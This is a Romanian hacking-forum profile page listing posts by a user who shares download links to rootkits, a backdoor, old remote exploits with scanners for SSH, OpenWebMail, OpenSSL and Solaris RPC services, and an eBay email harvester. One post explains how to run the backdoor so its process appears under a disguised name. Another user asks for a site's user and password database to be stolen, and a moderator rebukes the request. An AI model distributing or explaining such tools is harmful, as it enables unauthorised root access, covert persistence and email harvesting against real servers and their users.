Jump to content

cain2k

Members
 • Posts

  21
 • Joined

 • Last visited

Reputation

10 Good

About cain2k

 • Rank
  Registered user
  Newbie

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

 1. scannerul e facut de mine ... care-i problema ta . Exploitul nu-i. Scannerul foloseste pscan2 si grabbb. Scriptul l-am facut io.
 2. sparge situl asta http://www.tram-pararam.com ... adica ia baza de date cu useri si pass ... dar sa zici cum faci .. :@ Take Care ! Edit Nemessis: Nu mai cereti sa se sparga site-uri sau orice altceva aici pe forum. Vrei sa o faci fa-o singur.
 3. mozi ... asta nu trebe compilat ... este in perl ... doar ./get.pl . LOL. Pai da normal ca ia doar e-mails din descriere , dar asa vezi care-s aia care liciteaza.
 4. Ai citit din ce am scris ceva .. Se dezarhiveaza ala 3.tgz ... in el sunt 2 fisiere si un dir get.pl si inca filtru.sh Se editeaza get.pl ... se scrie Start BID si end BID ... ala cu start trebe sa nu aiba # la inceput. Si il lasi sa mearga ... In dir ebay o sa-tzi faca un fisier final.txt ... acolo nu intelegi mare lucru. Dar am pus si un fisier extractor.exe ... acolo bagi textul din final.txt ... si ii dai extract ... ce e-mails vrei tu ... GOT IT ???
 5. Vezi daca ai pe root nc ( netcat) ... prin el face call back. Si de asemenea, daca e serverul patch ... nu mere ... :@
 6. rootkit, patch de diferite exploituri remote ... http://rapidshare.com/files/2879185/srk.tar
 7. openwebmail scanner si exploit ... itzi da id de openwebmail ... si daca ai local root exploit.... devii root http://rapidshare.com/files/2878907/open.tgz
 8. un scanner de openssl ... mai vechi oleaca ... facut de mine http://rapidshare.com/files/2878836/aopen.tgz
 9. Nu-i facut de mine ... de un prieten din UMH ... http://rapidshare.com/files/2877677/cxkit.tar.html
 10. DA ? ... obtii drept de root ... pe un solaris ... si daca nu ai rk bun de solaris ... si program pt el ... stai si te uitzi ce frumos este ... .. a chiar .. o sa pun un rk de solaris ..
 11. cain2k

  rk simplu

  oricum ... linkul de pe rapidshare.ro nu mai merge .. god knows why .. asa ca l-am pus pe rapidshare.com
 12. ce zice el acolo cu faci aia si da-i click si push aia ... mergea prin 2000 ... Mai simplu folosesti un port scanner si gata ... si daca te intereseaza ce ruleaza pe http ... exista http://www.netcraft.com . Iar faza cu cart32.exe ... OLD ... versiunile vechi aveau o parola implicita ... parca "wemilo" ... si exista si un decrpiter de parola .. dar acu CHIAR daca reusesti sa dl cart32.ini ... este altfel criptat .. si nu am vazut pana acu decripter pentru el ... ca sa aflii parola de admin ... asa ca ... GOD !!! ... OLD !!!
 13. cain2k

  rk simplu

  Un rk folosit de mine pt RH 6.x pana la FC 3. Este simplu si mai mult un backdoor decat rootkit NU ARE e-mail !!! Se foloseste : ./all parola port fisier Parola = parola de logare, userul este root Port = pe ce port sa ruleze backdoorul Fisier = cum sa apara la ps ax daemonul. Nu apare ca executabil, ci ca serviciul -q . Gen /usr/bin/bashx. Exemplu : ./all alupigus 31337 /usr/sbin/daemon La ps ax sau socklist va apare /usr/sbin/daemon -q Este destul de vechi si nu stiu daca mai este valabil ... oricum ... merita incercat :@ http://rapidshare.com/files/2873999/rk.tgz.html
 14. Un exploit mai vechi pentru SSHD, respectiv serviciul ce ruleaza pe port 22. http://rapidshare.com/files/2874333/assh.tgz Scannerul este facut de mine ... Foloseste pscan si grabbb ... Have fun !!!
 15. Un scanner si exploit mai vechi. Scriptul este facut de mine ... asa ca ... Don`t expect much !!! http://rapidshare.com/files/2874164/asun.tgz Scaneaza pt portul 111 si testeaza de rpc.cachefsd si rpc.cmdsol. Exploiturile aferente sunt in aceeasi arhiva
×
×
 • Create New...